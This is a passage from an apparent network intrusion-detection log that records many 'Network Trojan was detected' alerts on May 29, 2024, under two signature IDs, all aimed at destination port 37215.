                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.457899
                SID:2835222
                Source Port:51078
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.475057
                SID:2835222
                Source Port:41270
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.628834
                SID:2829579
                Source Port:55736
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.874968
                SID:2835222
                Source Port:41614
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.946859
                SID:2829579
                Source Port:58416
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.795289
                SID:2835222
                Source Port:57796
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.850201
                SID:2835222
                Source Port:49128
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.556237
                SID:2829579
                Source Port:45700
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.762837
                SID:2835222
                Source Port:38720
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.873699
                SID:2829579
                Source Port:53826
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.547465
                SID:2829579
                Source Port:37432
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.137001
                SID:2835222
                Source Port:48130
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.321683
                SID:2835222
                Source Port:46178
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.369973
                SID:2829579
                Source Port:51826
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.717798
                SID:2829579
                Source Port:60760
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.654693
                SID:2835222
                Source Port:56834
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.363028
                SID:2835222
                Source Port:43256
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.207310
                SID:2829579
                Source Port:35110
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.712784
                SID:2829579
                Source Port:44674
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.465884
                SID:2829579
                Source Port:35590
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.883146
                SID:2835222
                Source Port:60918
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.859484
                SID:2835222
                Source Port:54132
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.795982
                SID:2829579
                Source Port:43512
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.728727
                SID:2835222
                Source Port:37178
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.982171
                SID:2835222
                Source Port:53018
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.084465
                SID:2835222
                Source Port:36470
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.869548
                SID:2829579
                Source Port:49416
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.014302
                SID:2829579
                Source Port:54662
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.652509
                SID:2829579
                Source Port:46840
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.226704
                SID:2835222
                Source Port:39830
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.562006
                SID:2835222
                Source Port:50268
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.631836
                SID:2829579
                Source Port:43710
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.160385
                SID:2829579
                Source Port:33250
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.269441
                SID:2829579
                Source Port:58182
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.902068
                SID:2829579
                Source Port:45832
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.790540
                SID:2829579
                Source Port:44674
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.839019
                SID:2829579
                Source Port:36480
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.227739
                SID:2829579
                Source Port:42462
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.953160
                SID:2829579
                Source Port:58772
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.667092
                SID:2835222
                Source Port:43530
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.844676
                SID:2829579
                Source Port:37198
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.385996
                SID:2829579
                Source Port:34804
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.967465
                SID:2835222
                Source Port:34812
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.399169
                SID:2835222
                Source Port:34220
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.675165
                SID:2835222
                Source Port:60824
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.321044
                SID:2829579
                Source Port:56866
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.864468
                SID:2835222
                Source Port:46688
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.236221
                SID:2829579
                Source Port:44716
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.257237
                SID:2829579
                Source Port:37934
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.868355
                SID:2829579
                Source Port:51608
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.287019
                SID:2829579
                Source Port:60318
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.330631
                SID:2835222
                Source Port:47038
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.133327
                SID:2835222
                Source Port:56404
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.134066
                SID:2829579
                Source Port:36494
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.728508
                SID:2829579
                Source Port:37552
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.736313
                SID:2829579
                Source Port:57454
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.881193
                SID:2835222
                Source Port:57282
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.272426
                SID:2829579
                Source Port:39960
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.617737
                SID:2829579
                Source Port:42304
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.849041
                SID:2829579
                Source Port:46564
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.738458
                SID:2835222
                Source Port:36278
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.847989
                SID:2829579
                Source Port:39712
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.664132
                SID:2835222
                Source Port:54498
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.269589
                SID:2829579
                Source Port:38160
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.969688
                SID:2835222
                Source Port:38908
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.975805
                SID:2835222
                Source Port:35388
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.325982
                SID:2829579
                Source Port:54348
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.525623
                SID:2835222
                Source Port:41418
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.780775
                SID:2835222
                Source Port:56232
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.855984
                SID:2835222
                Source Port:38546
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.111700
                SID:2829579
                Source Port:56938
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.945781
                SID:2829579
                Source Port:53812
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.779756
                SID:2829579
                Source Port:55440
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.799458
                SID:2829579
                Source Port:58778
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.175575
                SID:2835222
                Source Port:54140
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.853825
                SID:2829579
                Source Port:33078
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.717064
                SID:2829579
                Source Port:45218
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.947791
                SID:2835222
                Source Port:50458
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.969838
                SID:2835222
                Source Port:45508
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.958762
                SID:2829579
                Source Port:37910
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.985995
                SID:2835222
                Source Port:37746
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.993877
                SID:2829579
                Source Port:36982
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.281178
                SID:2829579
                Source Port:49512
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.872794
                SID:2835222
                Source Port:54812
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.465400
                SID:2835222
                Source Port:40678
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.654254
                SID:2829579
                Source Port:44892
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.223122
                SID:2835222
                Source Port:44014
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.265337
                SID:2835222
                Source Port:40106
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.885720
                SID:2835222
                Source Port:36560
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.789611
                SID:2835222
                Source Port:34158
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.288510
                SID:2829579
                Source Port:50100
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.021583
                SID:2829579
                Source Port:35646
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.823990
                SID:2829579
                Source Port:41328
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.968362
                SID:2835222
                Source Port:50606
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.318094
                SID:2829579
                Source Port:50238
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.502530
                SID:2829579
                Source Port:46566
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.261819
                SID:2829579
                Source Port:59788
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.779490
                SID:2829579
                Source Port:36694
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.948711
                SID:2829579
                Source Port:33858
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.209331
                SID:2835222
                Source Port:50192
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.035101
                SID:2835222
                Source Port:41248
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.451186
                SID:2829579
                Source Port:52904
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.939866
                SID:2835222
                Source Port:51434
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.971900
                SID:2835222
                Source Port:46522
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.878749
                SID:2829579
                Source Port:60934
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.224414
                SID:2829579
                Source Port:32928
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.042909
                SID:2835222
                Source Port:37576
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.264246
                SID:2829579
                Source Port:44462
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.385416
                SID:2835222
                Source Port:46738
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.473347
                SID:2835222
                Source Port:57456
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.222877
                SID:2829579
                Source Port:53860
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.465422
                SID:2835222
                Source Port:50322
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.920064
                SID:2835222
                Source Port:38834
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.326046
                SID:2835222
                Source Port:43800
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.988730
                SID:2835222
                Source Port:34502
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.896949
                SID:2835222
                Source Port:48410
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.224621
                SID:2829579
                Source Port:42512
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.287232
                SID:2835222
                Source Port:46994
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.322222
                SID:2835222
                Source Port:46862
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.025722
                SID:2835222
                Source Port:41864
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.109103
                SID:2829579
                Source Port:33670
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.181521
                SID:2835222
                Source Port:35906
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.832654
                SID:2829579
                Source Port:41432
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.668503
                SID:2835222
                Source Port:39054
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.977782
                SID:2835222
                Source Port:59736
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.788368
                SID:2829579
                Source Port:34782
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.325408
                SID:2829579
                Source Port:39358
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.180620
                SID:2829579
                Source Port:49054
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.933145
                SID:2829579
                Source Port:48842
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.911041
                SID:2835222
                Source Port:56312
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.385494
                SID:2835222
                Source Port:36652
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.329486
                SID:2829579
                Source Port:38180
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.732339
                SID:2829579
                Source Port:55286
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.784891
                SID:2829579
                Source Port:60004
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.694374
                SID:2835222
                Source Port:33324
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.870012
                SID:2835222
                Source Port:43040
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.583852
                SID:2829579
                Source Port:34592
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.716518
                SID:2829579
                Source Port:51976
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.854525
                SID:2829579
                Source Port:60644
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.463039
                SID:2829579
                Source Port:55532
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.811956
                SID:2835222
                Source Port:54408
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.220948
                SID:2829579
                Source Port:39218
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.321697
                SID:2829579
                Source Port:34926
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.014832
                SID:2829579
                Source Port:54626
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.273183
                SID:2835222
                Source Port:41194
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.949519
                SID:2835222
                Source Port:60268
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.863899
                SID:2835222
                Source Port:42216
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.935236
                SID:2835222
                Source Port:56316
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.660121
                SID:2835222
                Source Port:51242
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.320091
                SID:2829579
                Source Port:39986
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.511499
                SID:2829579
                Source Port:56496
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.828529
                SID:2835222
                Source Port:42232
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.217746
                SID:2829579
                Source Port:52318
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.862115
                SID:2829579
                Source Port:39024
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.231100
                SID:2835222
                Source Port:34940
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.363102
                SID:2829579
                Source Port:51878
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.561798
                SID:2835222
                Source Port:50082
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.716305
                SID:2829579
                Source Port:44218
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.788473
                SID:2829579
                Source Port:48176
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.100503
                SID:2835222
                Source Port:48468
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.563605
                SID:2829579
                Source Port:33880
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.462563
                SID:2829579
                Source Port:51460
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.175611
                SID:2835222
                Source Port:57934
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.418274
                SID:2835222
                Source Port:43478
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.360458
                SID:2835222
                Source Port:40286
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.871749
                SID:2829579
                Source Port:33788
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.763363
                SID:2835222
                Source Port:33926
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.815939
                SID:2829579
                Source Port:38932
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.580084
                SID:2829579
                Source Port:51838
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.764181
                SID:2835222
                Source Port:44668
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.166339
                SID:2829579
                Source Port:52780
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.689203
                SID:2829579
                Source Port:38292
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.416624
                SID:2835222
                Source Port:53108
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.981275
                SID:2829579
                Source Port:51996
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.664562
                SID:2835222
                Source Port:33224
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.583703
                SID:2829579
                Source Port:49482
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.811916
                SID:2829579
                Source Port:37930
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.548505
                SID:2835222
                Source Port:55990
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.782470
                SID:2835222
                Source Port:34444
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.473598
                SID:2835222
                Source Port:41886
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.990180
                SID:2835222
                Source Port:58544
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.890146
                SID:2835222
                Source Port:59368
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.564758
                SID:2835222
                Source Port:36932
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.984805
                SID:2835222
                Source Port:56432
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.798139
                SID:2835222
                Source Port:37524
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.264860
                SID:2829579
                Source Port:48852
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.155495
                SID:2835222
                Source Port:37454
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.782756
                SID:2835222
                Source Port:34484
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.323003
                SID:2835222
                Source Port:57070
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.584069
                SID:2835222
                Source Port:45494
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.512134
                SID:2829579
                Source Port:59122
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.728557
                SID:2835222
                Source Port:43578
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.903529
                SID:2835222
                Source Port:54720
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.160267
                SID:2835222
                Source Port:42616
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.842570
                SID:2835222
                Source Port:55966
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.506292
                SID:2829579
                Source Port:57148
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.474971
                SID:2835222
                Source Port:51006
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
